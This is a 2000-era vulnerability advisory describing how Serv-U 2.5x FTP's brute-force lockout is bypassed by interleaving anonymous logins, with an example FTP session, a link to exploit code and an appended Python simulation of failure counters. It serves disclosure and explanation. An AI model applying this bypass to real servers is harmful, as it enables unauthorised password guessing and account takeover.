CatSoft FTP Serv-U brute-force protection bypass vulnerability

Published: 2000-10-31
Updated: 2000-10-31
Severity: Medium
Threat level: ordinary user access rights
Error type: design error
Exploitation mode: server mode

Affected systems
Cat Soft Serv-U 2.5x

Detailed description
FTP Serv-U is an FTP server program. Serv-U has an anti-brute-force security measure: it does not indicate whether a user name is valid, and it disconnects the client after three unsuccessful LOGIN attempts. However, it has now been found that a remote user can bypass this anti-brute-force feature, as the following session shows:

USER USER1
>331 User name okay, need password.
PASS PASSWORD
>530 Not logged in.
USER USER1
>331 User name okay, need password.
PASS nextpassPASSWORD
>530 Not logged in.
USER anonymous
>331 User name okay, please send complete E-mail address as password.
PASS somemail@address.com
>230 User logged in, proceed.
USER USERNAME
>331 User name okay, need password.
PASS 3rdPASSWORD
>530 Not logged in.
USER USERNAME
>331 User name okay, need password.
PASS 4thPASSWORD
>530 Not logged in.
....
....

Test code
The test code can be downloaded from:
http://www.securityfocus.com/data/vulnerabilities/exploits/newftpbrute.java

Solution
None yet.
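As an added illustration (not code from the advisory or from Serv-U), the following Python replays the exchange above against two failure-counter policies. It assumes, as a hypothesis consistent with the transcript rather than a documented fact about Serv-U, that the vulnerable server reset its failure counter after the successful anonymous login; a per-connection counter that never resets closes the session at the third 530 reply.

```python
import re

# Constructed transcript reproducing the exchange shown in the advisory:
# client commands are unprefixed, server replies are prefixed with '>'.
SESSION = """\
USER USER1
>331 User name okay, need password.
PASS PASSWORD
>530 Not logged in.
USER USER1
>331 User name okay, need password.
PASS nextpassPASSWORD
>530 Not logged in.
USER anonymous
>331 User name okay, please send complete E-mail address as password.
PASS somemail@address.com
>230 User logged in, proceed.
USER USERNAME
>331 User name okay, need password.
PASS 3rdPASSWORD
>530 Not logged in.
USER USERNAME
>331 User name okay, need password.
PASS 4thPASSWORD
>530 Not logged in.
"""

MAX_FAILURES = 3  # the advisory's "three unsuccessful LOGIN" limit


def reply_codes(transcript):
    """Yield the numeric reply codes of the server lines, in order."""
    for line in transcript.splitlines():
        m = re.match(r">(\d{3}) ", line)
        if m:
            yield int(m.group(1))


def failures_until_disconnect(transcript, reset_on_success):
    """Replay the replies through a failure counter.

    Returns (failures counted when the replay stopped, disconnected?).
    reset_on_success=True models the hypothesised flawed policy, where a
    230 login clears the counter; False models a per-connection counter
    that only ever grows, which is the intended anti-brute-force behaviour.
    """
    failures = 0
    for code in reply_codes(transcript):
        if code == 530:  # "Not logged in": one failed login attempt
            failures += 1
            if failures >= MAX_FAILURES:
                return failures, True  # server would drop the connection here
        elif code == 230 and reset_on_success:
            failures = 0  # the flaw: an anonymous login wipes the history
    return failures, False
```

Against the page's transcript the resetting counter never reaches the limit even though four 530 replies occur, while the cumulative counter disconnects on the third.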